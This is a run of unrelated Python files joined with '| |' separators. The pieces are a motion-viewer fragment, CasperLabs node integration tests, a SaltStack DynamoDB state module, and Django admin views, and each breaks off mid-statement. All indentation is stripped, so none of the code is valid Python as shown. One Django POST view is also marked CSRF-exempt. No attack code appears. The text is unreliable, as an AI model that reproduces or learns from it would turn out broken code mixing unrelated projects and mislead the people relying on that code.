if dot_product/(len1*len2) >= 1.:
tmp_angle[0] = math.acos( 1.)
elif dot_product/(len1*len2) <= -1.:
tmp_angle[0] = math.acos( -1.)
else :
tmp_angle[0] = math.acos( dot_product/(len1*len2))
tmp_angle[0] = tmp_angle[0]*180/math.pi
cross_vector[0] = velocity_root[0][2]*velocity[0][0] - velocity_root[0][0]*velocity[0][2]
if which_style[now_frame_num-1] == 1:
arrow_color.totalColor = (85,107,47)
elif which_style[now_frame_num-1] == 2:
arrow_color.totalColor = (72,61,139)
elif which_style[now_frame_num-1] == 3:
arrow_color.totalColor = (139,69,19)
else :
if moving_angle[0] == 'on':
# arrow_color.totalColor = (75+100,0+100,130+100)
arrow_color.totalColor = ARROW_MOVING_COLOR
elif moving_angle[0] == 'off':
# arrow_color.totalColor =(75,0,130)
arrow_color.totalColor = ARROW_FIXED_COLOR
if not SIMULATION_ON:
if now_frame_num > total_frame_num[0]-1:
call_motionstitch_time(now_frame_num)
if SIMULATION_ON:
if SCREEN_SHOT:
viewer = ysv.SimpleViewer([150,50,800*2+180,600*2+55])
else:
viewer = ysv.SimpleViewer([150,50,800+180,600+55])
else:
viewer = ysv.SimpleViewer()
viewer.setCameraTarget(result_motion[0].getJointPositionGlobal(0))
viewer.objectInfoWnd.angle_value_slider.val_slider_handle = val_slider_handle
viewer.objectInfoWnd.angle_but_cb_handle = angle_but_cb_handle
viewer.objectInfoWnd.angle_but_cb = angle_but_cb
viewer.objectInfoWnd.speed_but_cb = speed_but_cb
viewer.objectInfoWnd.style_but_cb = style_but_cb
viewer.motionViewWnd.glWindow.event_handle = event_handle
viewer.motionViewWnd.make_motion_seq = make_motion_seq
#===============================================================================
#===============================================================================
#===============================================================================
# # # interactive_control
#===============================================================================
#===============================================================================
#===============================================================================
#def interactive_control():
class ForceInfo:
def __init__(self, startFrame, duration, force, targetBody):
self.startFrame = startFrame # frame
self.duration = duration # sec
self.force = force # Newton
self.targetBody = targetBody
#===============================================================================
# load motion
#===============================================================================
c_swf_offset = -.025
# c_swf_offset = .01
# c_swf_offset = .005
K_stp_pos = 0.
# c5 = .5; c6 = .01
c5 = .5; c6 = .02
# c5 = .5; c6 = .05
# c5 = 1.; c6 = .05
# c5 = .0; c6 = .0
K_stb_vel = .1
K_stb_pos = .1
OLD_SWING_HEIGHT = False
# OLD_SWING_HEIGHT = True
HIGHER_OFFSET = True
# HIGHER_OFFSET = False
dir = './icmotion_last/'
MULTI_VIEWER = False
CAMERA_TRACKING = True
# global parameters
# Kt = 20.; Dt = 2*(Kt**.5)
# Ks = 2000.; Ds = 2*(Ks**.5)
Kt = 20.; Dt = 2*(Kt**.5)
Ks = 2000.; Ds = 2*(Ks**.5)
mu = 2.
# constaants
c_min_contact_vel = 100.
c_min_contact_time = .7
c_landing_duration = .2
c_taking_duration = .3
c_swf_mid_offset = .07
# c_swf_mid_offset = .05
# c_swf_stability = .5
# c_swf_stability = .0
c_locking_vel = .05
# K_stb_vel = .1
# K_stp_pos = 0.
# default_K_swp_pos_sag_faster = .05
# K_stb_pos = .0
paramd = {}
# paramd['start'] = {'K_swp_vel_sag':.1, 'K_swp_vel_cor':.4, 'K_swp_pos_sag':1., 'K_swp_pos_cor':0.}
paramd['start'] = {'K_swp_vel_sag':.1, 'K_swp_vel_cor':.25, 'K_swp_pos_sag':1., 'K_swp_pos_cor':.3, 'K_swp_pos_sag_faster':.05}
# paramd_normal = {'K_swp_vel_sag':.0, 'K_swp_vel_cor':.4, 'K_swp_pos_sag':1.5, 'K_swp_pos_cor':0.}
# paramd_normal = {'K_swp_vel_sag':.0, 'K_swp_vel_cor':.25, 'K_swp_pos_sag':1.7, 'K_swp_pos_cor':.3}
paramd_normal = {'K_swp_vel_sag':.0, 'K_swp_vel_cor':.3, 'K_swp_pos_sag':1.8, 'K_swp_pos_cor':.2, 'K_swp_pos_sag_faster':0.}
paramd['right_left_normal'] = paramd_normal
paramd['right_right_normal'] = paramd_normal
paramd['left_left_normal'] = | |
import os
import logging
import pytest
import json
from pathlib import Path
from pytest import fixture, raises
from test.cl_node.contract_address import contract_address
from test.cl_node.common import testing_root_path, HELLO_NAME_CONTRACT
from test.cl_node.casperlabs_accounts import Account, GENESIS_ACCOUNT
from test.cl_node.common import extract_block_hash_from_propose_output
from test.cl_node.docker_node import DockerNode
from test.cl_node.errors import NonZeroExitCodeError
from test.cl_node.wait import wait_for_genesis_block
from casperlabs_client import ABI
from test.cl_node.cli import CLI, DockerCLI, CLIErrorExit
"""
Test account state retrieval with query-state.
Example output of the Scala client:
account {
public_key: "3030303030303030303030303030303030303030303030303030303030303030"
purse_id {
uref: "0000000000000000000000000000000000000000000000000000000000000000"
access_rights: READ_ADD_WRITE
}
associated_keys {
public_key: "3030303030303030303030303030303030303030303030303030303030303030"
weight: 1
}
action_thresholds {
deployment_threshold: 1
key_management_threshold: 1
}
account_activity {
key_management_last_used: 0
deployment_last_used: 0
inactivity_period_limit: 100
}
}
"""
def deploy_and_propose_from_genesis(node, contract):
return node.deploy_and_propose(
session_contract=contract,
payment_contract=contract,
from_address=GENESIS_ACCOUNT.public_key_hex,
public_key=GENESIS_ACCOUNT.public_key_path,
private_key=GENESIS_ACCOUNT.private_key_path,
)
def account_state(node, block_hash, account=GENESIS_ACCOUNT):
return node.d_client.query_state(
block_hash=block_hash, key_type="address", key=account.public_key_hex, path=""
)
def test_account_state(one_node_network):
node = one_node_network.docker_nodes[0]
block_hash = deploy_and_propose_from_genesis(node, "test_counterdefine.wasm")
deploys = node.client.show_deploys(block_hash)
assert not deploys[0].is_error
acct_state = account_state(node, block_hash)
known_urefs = acct_state.account[0].known_urefs
names = [uref.name for uref in known_urefs]
assert "counter" in names
block_hash = deploy_and_propose_from_genesis(node, "test_countercall.wasm")
acct_state = account_state(node, block_hash)
known_urefs = acct_state.account[0].known_urefs
names = [uref.name for uref in known_urefs]
assert "counter" in names
def test_transfer_with_overdraft(one_node_network):
acct1 = Account(1)
acct2 = Account(2)
node: DockerNode = one_node_network.docker_nodes[0]
# Transfer 1000000 from genesis... to acct1...
# For compatibility with EE with no execution cost
# payment_contract="transfer_to_account.wasm"
block_hash = node.transfer_to_account(
to_account_id=1,
amount=1000000,
from_account_id="genesis",
payment_contract="transfer_to_account.wasm",
)
deploys = node.client.show_deploys(block_hash)
assert not deploys[0].is_error, f"error_message: {deploys[0].error_message}"
# Response not used, but assures account exist
_ = account_state(node, block_hash, acct1)
# Should error as account doesn't exist.
with raises(Exception):
_ = account_state(block_hash, acct2.public_key_hex)
# No API currently exists for getting balance to check transfer.
# Transfer 750000 from acct1... to acct2...
block_hash = node.transfer_to_account(
to_account_id=2,
amount=750000,
from_account_id=1,
payment_contract="transfer_to_account.wasm",
)
deploys = node.client.show_deploys(block_hash)
assert not deploys[0].is_error, f"error_message: {deploys[0].error_message}"
# Response not used, but assures account exist
_ = account_state(node, block_hash, acct2)
# Transfer 750000000000 from acct1... to acct2...
# Should fail with acct1 overdrawn. Requires assert in contract to generate is_error.
with raises(Exception):
_ = node.transfer_to_account(
to_account_id=2,
amount=750000000000,
from_account_id=1,
payment_contract="transfer_to_account.wasm",
)
def test_transfer_to_accounts(one_node_network):
node: DockerNode = one_node_network.docker_nodes[0]
# Perform multiple transfers with end result of Acct1 = 100, Acct2 = 100, Acct3 = 800
node.transfer_to_accounts([(1, 1000), (2, 900, 1), (3, 800, 2)])
with raises(Exception):
# Acct 1 has not enough funds so it should fail
node.transfer_to_account(
to_account_id=4,
amount=100000000000,
from_account_id=1,
payment_contract="transfer_to_account.wasm",
)
node.transfer_to_account(
to_account_id=4,
amount=100,
from_account_id=2,
payment_contract="transfer_to_account.wasm",
)
# TODO: Improve checks once balance is easy to read.
def balance(node, account_address, block_hash):
try:
return node.client.get_balance(account_address, block_hash)
except Exception:
return 0
def test_scala_client_balance(one_node_network):
node: DockerNode = one_node_network.docker_nodes[0]
accounts = [Account(i) for i in range(1, 4)]
block_hash = list(node.p_client.show_blocks(1))[0].summary.block_hash.hex()
initial = [
balance(node, account.public_key_hex, block_hash) for account in accounts
]
# Perform multiple transfers with end result of Acct1 = 200, Acct2 = 100, Acct3 = 700
hashes = node.transfer_to_accounts([(1, 1000), (2, 800, 1), (3, 700, 2)])
for acct_num, value in ((0, 200), (1, 100), (2, 700)):
addr = accounts[acct_num].public_key_hex
bal = node.d_client.get_balance(account_address=addr, block_hash=hashes[-1])
assert bal == initial[acct_num] + value
ffi_test_contracts = [
("getcallerdefine.wasm", "getcallercall.wasm"),
("listknownurefsdefine.wasm", "listknownurefscall.wasm"),
]
def deploy_and_propose_expect_no_errors(node, contract):
client = node.d_client
block_hash = node.deploy_and_propose(
session_contract=contract,
payment_contract=contract,
from_address=node.genesis_account.public_key_hex,
public_key=node.genesis_account.public_key_path,
private_key=node.genesis_account.private_key_path,
)
r = client.show_deploys(block_hash)[0]
assert r.is_error is False, f"error_message: {r.error_message}"
@pytest.mark.parametrize("define_contract, call_contract", ffi_test_contracts)
def test_get_caller(one_node_network, define_contract, call_contract):
node = one_node_network.docker_nodes[0]
deploy_and_propose_expect_no_errors(node, define_contract)
deploy_and_propose_expect_no_errors(node, call_contract)
@pytest.mark.parametrize("wasm", [HELLO_NAME_CONTRACT, "old_wasm/test_helloname.wasm"])
def test_multiple_propose(one_node_network, wasm):
"""
Feature file: propose.feature
Scenario: Single node deploy and multiple propose generates an Exception.
OP-182: First propose should be success, and subsequent propose calls should throw an error/exception.
"""
node = one_node_network.docker_nodes[0]
deploy_and_propose_from_genesis(node, wasm)
number_of_blocks = node.client.get_blocks_count(100)
try:
_ = node.client.propose()
assert False, "Second propose must not succeed, should throw"
except NonZeroExitCodeError as e:
assert e.exit_code == 1, "Second propose should fail"
wait_for_genesis_block(node)
# Number of blocks after second propose should not change
assert node.client.get_blocks_count(100) == number_of_blocks
# Examples of query-state executed with the Scala client that result in errors:
# CasperLabs/docker $ ./client.sh node-0 propose
# Response: Success! Block 9d38836598... created and added.
# CasperLabs/docker $ ./client.sh node-0 query-state --block-hash '"9d"' --key '"a91208047c"' --path file.xxx --type hash
# NOT_FOUND: Cannot find block matching hash "9d"
# CasperLabs/docker$ ./client.sh node-0 query-state --block-hash 9d --key '"a91208047c"' --path file.xxx --type hash
# INVALID_ARGUMENT: Key of type hash must have exactly 32 bytes, 5 =/= 32 provided.
# CasperLabs/docker$ ./client.sh node-0 query-state --block-hash 9d --key 3030303030303030303030303030303030303030303030303030303030303030 --path file.xxx --type hash
# INVALID_ARGUMENT: Value not found: " Hash([48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48])"
@pytest.fixture() # scope="module")
def node(one_node_network):
return one_node_network.docker_nodes[0]
@pytest.fixture() # (scope="module")
def client(node):
return node.d_client
@pytest.fixture() # (scope="module")
def block_hash(node):
return node.deploy_and_propose(
session_contract="test_helloname.wasm", payment_contract="test_helloname.wasm"
)
block_hash_queries = [
(
{
"block_hash": "9d000000",
"key": "a91208047c",
"path": "file.xxx",
"key_type": "hash",
},
"NOT_FOUND: Cannot find block matching",
),
(
{"key": "a91208047c", "path": "file.xxx", "key_type": "hash"},
"INVALID_ARGUMENT: Key of type hash must have exactly 32 bytes",
),
({"path": "file.xxx", "key_type": "hash"}, "INVALID_ARGUMENT: Value not found"),
]
@pytest.mark.parametrize("query, expected", block_hash_queries)
def test_query_state_error(node, client, block_hash, query, expected):
if "block_hash" not in query:
query["block_hash"] = block_hash
if "key" not in query:
query["key"] = GENESIS_ACCOUNT.public_key_hex
with pytest.raises(NonZeroExitCodeError) as excinfo:
_ = client.query_state(**query)
assert expected in excinfo.value.output
def test_revert_subcall(client, node):
# This contract calls another contract that calls revert(2)
block_hash = deploy_and_propose_from_genesis(
node, "test_subcall_revert_define.wasm"
)
r = client.show_deploys(block_hash)[0]
assert not r.is_error
assert r.error_message == ""
deploy_hash = r.deploy.deploy_hash
r = client.show_deploy(deploy_hash)
assert r.deploy.deploy_hash == deploy_hash
block_hash = deploy_and_propose_from_genesis(node, "test_subcall_revert_call.wasm")
r = client.show_deploys(block_hash)[0]
assert r.is_error
assert r.error_message == "Exit code: 2"
def test_revert_direct(client, node):
# This contract calls revert(1) directly
block_hash = deploy_and_propose_from_genesis(node, "test_direct_revert_call.wasm")
r = client.show_deploys(block_hash)[0]
assert r.is_error
assert r.error_message == "Exit code: 1"
def test_deploy_with_valid_signature(one_node_network):
"""
Feature file: deploy.feature
Scenario: Deploy with valid signature
"""
node0 = one_node_network.docker_nodes[0]
block_hash = deploy_and_propose_from_genesis(node0, "test_helloname.wasm")
deploys = node0.client.show_deploys(block_hash)
assert deploys[0].is_error is False
def test_deploy_with_invalid_signature(one_node_network):
"""
Feature file: deploy.feature
Scenario: Deploy with invalid signature
"""
node0 = one_node_network.docker_nodes[0]
with pytest.raises(NonZeroExitCodeError):
node0.client.deploy(
from_address=GENESIS_ACCOUNT.public_key_hex,
session_contract="test_helloname.wasm",
payment_contract="test_helloname.wasm",
private_key="validator-0-private-invalid.pem",
public_key="validator-0-public-invalid.pem",
)
"""
Feature file: ~/CasperLabs/integration-testing/features/deploy.feature
"""
def deploy_and_propose(node, contract):
node.client.deploy(
session_contract=contract,
payment_contract=contract,
from_address=GENESIS_ACCOUNT.public_key_hex,
public_key=GENESIS_ACCOUNT.public_key_path,
private_key=GENESIS_ACCOUNT.private_key_path,
)
return extract_block_hash_from_propose_output(node.client.propose())
def deploy(node, contract):
message = node.client.deploy(
from_address=GENESIS_ACCOUNT.public_key_hex,
public_key=GENESIS_ACCOUNT.public_key_path,
private_key=GENESIS_ACCOUNT.private_key_path,
session_contract=contract,
payment_contract=contract,
)
assert "Success!" in message
return message.split()[2]
def propose(node):
return extract_block_hash_from_propose_output(node.client.propose())
def deploy_hashes(node, block_hash):
return set(d.deploy.deploy_hash for d in node.client.show_deploys(block_hash))
# Python Client (library)
# fmt: off
def resource(fn):
cur_path = Path(os.path.realpath(__file__)).parent
while cur_path.name != "integration-testing":
cur_path = cur_path.parent
return cur_path / "resources" / fn
def test_args_parser():
account = (
b"\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x00\x08"
b"\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07"
)
amount = 123456
args = [{"name": "amount", "value": {"long_value": amount}},
{"name": "account", "value": {"bytes_value": account.hex()}},
{"name": "purse_id", "value": {"optional_value": {}}},
{"name": "number", "value": {"big_int": {"value": "2", "bit_width": 512}}}]
json_str = json.dumps(args)
assert ABI.args_from_json(json_str) == ABI.args(
[ABI.long_value(amount), ABI.account(account), ABI.optional_value(None), ABI.big_int(2)]
)
@fixture()
def genesis_public_signing_key():
with GENESIS_ACCOUNT.public_key_binary_file() as f:
yield f
def test_deploy_with_args(one_node_network, genesis_public_signing_key):
"""
Deploys test contracts that do:
revert(get_arg(0)); // for u32 and u512
and
revert(sum(address_bytes[u8; 32]) + u32); for multiple argument test.
Tests args get correctly encoded and decoded in the contract.
Test expects the test contracts test_args_u32.wasm and test_args_u512.wasm
to deserialize correctly their arguments and then call revert with value
of the argument (converted to a Rust native int, as expected by revert).
If the test contracts don't fail or if their exit code is different
than expected, the test will fail.
"""
node = one_node_network.docker_nodes[0]
client = node.p_client.client
for wasm, encode in [
(resource("test_args_u32.wasm"), ABI.u32),
(resource("test_args_u512.wasm"), ABI.u512),
]:
for number in [1, 12, 256, 1024]:
response, deploy_hash = client.deploy(
payment=wasm,
session=wasm,
public_key=resource("accounts/account-public-genesis.pem"),
private_key=resource("accounts/account-private-genesis.pem"),
session_args=ABI.args([encode(number)]),
)
logging.info(
f"DEPLOY RESPONSE: {response} deploy_hash: {deploy_hash.hex()}"
)
response = client.propose()
# Need to convert to hex string from bytes
block_hash = response.block_hash.hex()
for deploy_info in client.showDeploys(block_hash):
assert deploy_info.is_error is True
assert deploy_info.error_message == f"Exit code: {number}"
wasm = resource("test_args_multi.wasm")
account_hex = "0101010102020202030303030404040405050505060606060707070708080808"
number = 1000
total_sum = sum([1, 2, 3, 4, 5, 6, 7, 8]) * 4 + number
response, deploy_hash = client.deploy(
payment=wasm,
session=wasm,
public_key=resource("accounts/account-public-genesis.pem"),
private_key=resource("accounts/account-private-genesis.pem"),
session_args=ABI.args(
[ABI.account(bytes.fromhex(account_hex)), ABI.u32(number)]
),
)
logging.info(f"DEPLOY RESPONSE: {response} deploy_hash: {deploy_hash.hex()}")
response = client.propose()
block_hash = response.block_hash.hex()
for deploy_info in client.showDeploys(block_hash):
assert deploy_info.is_error is True
assert deploy_info.error_message == f"Exit code: {total_sum}"
for blockInfo in client.showBlocks(10):
assert blockInfo.status.stats.block_size_bytes > 0
# Python CLI #
@pytest.fixture() # scope="module")
def cli(one_node_network):
return CLI(one_node_network.docker_nodes[0], "casperlabs_client")
@pytest.fixture() # scope="module")
def scala_cli(one_node_network):
return DockerCLI(one_node_network.docker_nodes[0])
def test_cli_no_parameters(cli):
with raises(CLIErrorExit) as | |
"""
Manage DynamoDB Tables
======================
.. versionadded:: 2015.5.0
Create and destroy DynamoDB tables. Be aware that this interacts with Amazon's
services, and so may incur charges.
This module uses ``boto``, which can be installed via package, or pip.
This module accepts explicit DynamoDB credentials but can also utilize
IAM roles assigned to the instance through Instance Profiles. Dynamic
credentials are then automatically obtained from AWS API and no further
configuration is necessary. More information available `here
<http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html>`_.
If IAM roles are not used you need to specify them either in a pillar file or
in the minion's config file:
.. code-block:: yaml
keyid: <KEY>
key: <KEY>
region: us-east-1
It's also possible to specify ``key``, ``keyid`` and ``region`` via a
profile, either passed in as a dict, or as a string to pull from
pillars or minion config:
.. code-block:: yaml
myprofile:
keyid: <KEY>
key: <KEY>
region: us-east-1
.. code-block:: yaml
Ensure DynamoDB table does not exist:
boto_dynamodb.absent:
- table_name: new_table
- keyid: <KEY>
- key: <KEY>
- region: us-east-1
Ensure DynamoDB table exists:
boto_dynamodb.present:
- table_name: new_table
- read_capacity_units: 1
- write_capacity_units: 2
- hash_key: primary_id
- hash_key_data_type: N
- range_key: start_timestamp
- range_key_data_type: N
- keyid: <KEY>
- key: <KEY>
- region: us-east-1
- local_indexes:
- index:
- name: "primary_id_end_timestamp_index"
- hash_key: primary_id
- hash_key_data_type: N
- range_key: end_timestamp
- range_key_data_type: N
- global_indexes:
- index:
- name: "name_end_timestamp_index"
- hash_key: name
- hash_key_data_type: S
- range_key: end_timestamp
- range_key_data_type: N
- read_capacity_units: 3
- write_capacity_units: 4
It's possible to specify cloudwatch alarms that will be setup along with the
DynamoDB table. Note the alarm name will be defined by the name attribute
provided, plus the DynamoDB resource name.
.. code-block:: yaml
Ensure DynamoDB table exists:
boto_dynamodb.present:
- name: new_table
- read_capacity_units: 1
- write_capacity_units: 2
- hash_key: primary_id
- hash_key_data_type: N
- range_key: start_timestamp
- range_key_data_type: N
- alarms:
ConsumedWriteCapacityUnits:
name: 'DynamoDB ConsumedWriteCapacityUnits **MANAGED BY SALT**'
attributes:
metric: ConsumedWriteCapacityUnits
namespace: AWS/DynamoDB
statistic: Sum
comparison: '>='
# threshold_percent is used to calculate the actual threshold
# based on the provisioned capacity for the table.
threshold_percent: 0.75
period: 300
evaluation_periods: 2
unit: Count
description: 'DynamoDB ConsumedWriteCapacityUnits'
alarm_actions: [ 'arn:aws:sns:us-east-1:1234:my-alarm' ]
insufficient_data_actions: []
ok_actions: [ 'arn:aws:sns:us-east-1:1234:my-alarm' ]
- keyid: <KEY>
- key: <KEY>
- region: us-east-1
You can also use alarms from pillars, and override values from the pillar
alarms by setting overrides on the resource. Note that 'boto_dynamodb_alarms'
will be used as a default value for all resources, if defined and can be
used to ensure alarms are always set for a resource.
Setting the alarms in a pillar:
.. code-block:: yaml
boto_dynamodb_alarms:
ConsumedWriteCapacityUnits:
name: 'DynamoDB ConsumedWriteCapacityUnits **MANAGED BY SALT**'
attributes:
metric: ConsumedWriteCapacityUnits
namespace: AWS/DynamoDB
statistic: Sum
comparison: '>='
# threshold_percent is used to calculate the actual threshold
# based on the provisioned capacity for the table.
threshold_percent: 0.75
period: 300
evaluation_periods: 2
unit: Count
description: 'DynamoDB ConsumedWriteCapacityUnits'
alarm_actions: [ 'arn:aws:sns:us-east-1:1234:my-alarm' ]
insufficient_data_actions: []
ok_actions: [ 'arn:aws:sns:us-east-1:1234:my-alarm' ]
Ensure DynamoDB table exists:
boto_dynamodb.present:
- name: new_table
- read_capacity_units: 1
- write_capacity_units: 2
- hash_key: primary_id
- hash_key_data_type: N
- range_key: start_timestamp
- range_key_data_type: N
- alarms:
ConsumedWriteCapacityUnits:
attributes:
threshold_percent: 0.90
period: 900
"""
import copy
import datetime
import logging
import math
import sys
import salt.utils.dictupdate as dictupdate
from salt.ext import six
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(name)s %(levelname)s %(message)s",
stream=sys.stdout,
)
log = logging.getLogger()
class GsiNotUpdatableError(Exception):
"""Raised when a global secondary index cannot be updated."""
def __virtual__():
"""
Only load if boto_dynamodb is available.
"""
if "boto_dynamodb.exists" in __salt__:
return "boto_dynamodb"
return (False, "boto_dynamodb module could not be loaded")
def present(
name=None,
table_name=None,
region=None,
key=None,
keyid=None,
profile=None,
read_capacity_units=None,
write_capacity_units=None,
alarms=None,
alarms_from_pillar="boto_dynamodb_alarms",
hash_key=None,
hash_key_data_type=None,
range_key=None,
range_key_data_type=None,
local_indexes=None,
global_indexes=None,
backup_configs_from_pillars="boto_dynamodb_backup_configs",
):
"""
Ensure the DynamoDB table exists. Table throughput can be updated after
table creation.
Global secondary indexes (GSIs) are managed with some exceptions:
- If a GSI deletion is detected, a failure will occur (deletes should be
done manually in the AWS console).
- If multiple GSIs are added in a single Salt call, a failure will occur
(boto supports one creation at a time). Note that this only applies after
table creation; multiple GSIs can be created during table creation.
- Updates to existing GSIs are limited to read/write capacity only
(DynamoDB limitation).
name
Name of the DynamoDB table
table_name
Name of the DynamoDB table (deprecated)
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string)
that contains a dict with region, key and keyid.
read_capacity_units
The read throughput for this table
write_capacity_units
The write throughput for this table
hash_key
The name of the attribute that will be used as the hash key
for this table
hash_key_data_type
The DynamoDB datatype of the hash key
range_key
The name of the attribute that will be used as the range key
for this table
range_key_data_type
The DynamoDB datatype of the range key
local_indexes
The local indexes you would like to create
global_indexes
The global indexes you would like to create
backup_configs_from_pillars
Pillars to use to configure DataPipeline backups
"""
ret = {"name": name, "result": True, "comment": "", "changes": {}}
if table_name:
ret["warnings"] = [
"boto_dynamodb.present: `table_name` is deprecated." " Please use `name` instead."
]
ret["name"] = table_name
name = table_name
comments = []
changes_old = {}
changes_new = {}
# Ensure DynamoDB table exists
table_exists = __salt__["boto_dynamodb.exists"](name, region, key, keyid, profile)
if not table_exists:
if __opts__["test"]:
ret["result"] = None
ret["comment"] = "DynamoDB table {} would be created.".format(name)
return ret
else:
is_created = __salt__["boto_dynamodb.create_table"](
name,
region,
key,
keyid,
profile,
read_capacity_units,
write_capacity_units,
hash_key,
hash_key_data_type,
range_key,
range_key_data_type,
local_indexes,
global_indexes,
)
if not is_created:
ret["result"] = False
ret["comment"] = "Failed to create table {}".format(name)
_add_changes(ret, changes_old, changes_new)
return ret
comments.append("DynamoDB table {} was successfully created".format(name))
changes_new["table"] = name
changes_new["read_capacity_units"] = read_capacity_units
changes_new["write_capacity_units"] = write_capacity_units
changes_new["hash_key"] = hash_key
changes_new["hash_key_data_type"] = hash_key_data_type
changes_new["range_key"] = range_key
changes_new["range_key_data_type"] = range_key_data_type
changes_new["local_indexes"] = local_indexes
changes_new["global_indexes"] = global_indexes
else:
comments.append("DynamoDB table {} exists".format(name))
# Ensure DynamoDB table provisioned throughput matches
description = __salt__["boto_dynamodb.describe"](name, region, key, keyid, profile)
provisioned_throughput = description.get("Table", {}).get("ProvisionedThroughput", {})
current_write_capacity_units = provisioned_throughput.get("WriteCapacityUnits")
current_read_capacity_units = provisioned_throughput.get("ReadCapacityUnits")
throughput_matches = (
current_write_capacity_units == write_capacity_units
and current_read_capacity_units == read_capacity_units
)
if not throughput_matches:
if __opts__["test"]:
ret["result"] = None
comments.append("DynamoDB table {} is set to be updated.".format(name))
else:
is_updated = __salt__["boto_dynamodb.update"](
name,
throughput={
"read": read_capacity_units,
"write": write_capacity_units,
},
region=region,
key=key,
keyid=keyid,
profile=profile,
)
if not is_updated:
ret["result"] = False
ret["comment"] = "Failed to update table {}".format(name)
_add_changes(ret, changes_old, changes_new)
return ret
comments.append("DynamoDB table {} was successfully updated".format(name))
changes_old["read_capacity_units"] = (current_read_capacity_units,)
changes_old["write_capacity_units"] = (current_write_capacity_units,)
changes_new["read_capacity_units"] = (read_capacity_units,)
changes_new["write_capacity_units"] = (write_capacity_units,)
else:
comments.append("DynamoDB table {} throughput matches".format(name))
provisioned_indexes = description.get("Table", {}).get("GlobalSecondaryIndexes", [])
_ret = _global_indexes_present(
provisioned_indexes,
global_indexes,
changes_old,
changes_new,
comments,
name,
region,
key,
keyid,
profile,
)
if not _ret["result"]:
comments.append(_ret["comment"])
ret["result"] = _ret["result"]
if ret["result"] is False:
ret["comment"] = ",\n".join(comments)
_add_changes(ret, changes_old, changes_new)
return ret
_ret = _alarms_present(
name,
alarms,
alarms_from_pillar,
write_capacity_units,
read_capacity_units,
region,
key,
keyid,
profile,
)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
comments.append(_ret["comment"])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
ret["comment"] = ",\n".join(comments)
_add_changes(ret, changes_old, changes_new)
return ret
# Ensure backup datapipeline is present
datapipeline_configs = copy.deepcopy(__salt__["pillar.get"](backup_configs_from_pillars, []))
for config in datapipeline_configs:
datapipeline_ret = _ensure_backup_datapipeline_present(
name=name,
schedule_name=config["name"],
period=config["period"],
utc_hour=config["utc_hour"],
s3_base_location=config["s3_base_location"],
)
# Add comments and changes if successful changes were made (True for live mode,
# None for test mode).
if datapipeline_ret["result"] in [True, None]:
ret["result"] = datapipeline_ret["result"]
comments.append(datapipeline_ret["comment"])
if datapipeline_ret.get("changes"):
ret["changes"]["backup_datapipeline_{}".format(config["name"])] = (
datapipeline_ret.get("changes"),
)
else:
ret["comment"] = ",\n".join([ret["comment"], datapipeline_ret["comment"]])
_add_changes(ret, changes_old, changes_new)
return ret
ret["comment"] = ",\n".join(comments)
_add_changes(ret, changes_old, changes_new)
return ret
def _add_changes(ret, changes_old, changes_new):
if changes_old:
ret["changes"]["old"] = changes_old
if changes_new:
ret["changes"]["new"] = changes_new
def _global_indexes_present(
provisioned_indexes,
global_indexes,
changes_old,
changes_new,
comments,
name,
region,
key,
keyid,
profile,
):
"""Handles global secondary index for the table present state."""
ret = {"result": True}
if provisioned_indexes:
provisioned_gsi_config = {index["IndexName"]: index for index in provisioned_indexes}
else:
provisioned_gsi_config = {}
provisioned_index_names = set(provisioned_gsi_config.keys())
# Map of index name to given Salt config for this run. This loop is complicated
# because global_indexes is made up | |
<gh_stars>0
import time
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views import View
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_http_methods
from backstage.models import SmAdminMenu, IndexInfo, CarouselDisplay, NewsInfo, ContactInfo, ColumnListsInfo
from core.session.ManageSession import getheader_info
@login_required
def header_index(request):
"""
# 管理首页
:param request:h=success&i=v1
:return:
"""
h = request.GET.get("h", "")
i = request.GET.get("i", "")
info = {}
if h == "success" and i != "":
info["s"] = True
info["e"] = False
info["info"] = "修改成功!"
elif h == "error" and i != "":
info["s"] = False
info["e"] = True
info["info"] = "修改失敗!"
else:
info["s"] = False
info["e"] = False
header_info = getheader_info(request)
adminMenuList = {}
for parent_id in range(1, 8):
smAdminMenu = SmAdminMenu.objects.filter(parent_id=parent_id).order_by('menu_order')
adminMenuList["menu_" + str(parent_id)] = smAdminMenu
print(adminMenuList)
URL_Info = IndexInfo.objects.all() #
Carousel_Info = CarouselDisplay.objects.all().order_by('carousel_nub') #
News_Info = NewsInfo.objects.all() #
Contact_Info = ContactInfo.objects.all() #
return render(request, "backstage/userauth/pagefile/page/header-index.html",
{"header_info": header_info, "adminMenuList": adminMenuList, "info": info, "URL_Info": URL_Info,
"Carousel_Info": Carousel_Info, "News_Info": News_Info, "Contact_Info": Contact_Info})
@login_required
def footer_index(request):
"""
# 管理首页
:param request:h=success&i=v1
:return:
"""
h = request.GET.get("h", "")
i = request.GET.get("i", "")
info = {}
if h == "success" and i != "":
info["s"] = True
info["e"] = False
info["info"] = "修改成功!"
elif h == "error" and i != "":
info["s"] = False
info["e"] = True
info["info"] = "修改失敗!"
else:
info["s"] = False
info["e"] = False
header_info = getheader_info(request)
adminMenuList = {}
for parent_id in range(1, 8):
smAdminMenu = SmAdminMenu.objects.filter(parent_id=parent_id).order_by('menu_order')
adminMenuList["menu_" + str(parent_id)] = smAdminMenu
print(adminMenuList)
column_lists = ColumnListsInfo.objects.all().order_by('column_lists_nub') #
return render(request, "backstage/userauth/pagefile/page/foot-index.html",
{"header_info": header_info, "adminMenuList": adminMenuList, "info": info,
"column_lists": column_lists})
@login_required
@csrf_exempt
@require_http_methods(["POST"])
def add_menu(request):
"""
:param request:
:return:
"""
menu = request.GET.get("menu")
menu_name = request.POST.get("menu_name", "")
menu_url = request.POST.get("menu_url", "")
menu_ft = request.POST.get("menu_ft", "")
menu_jt = request.POST.get("menu_jt", "")
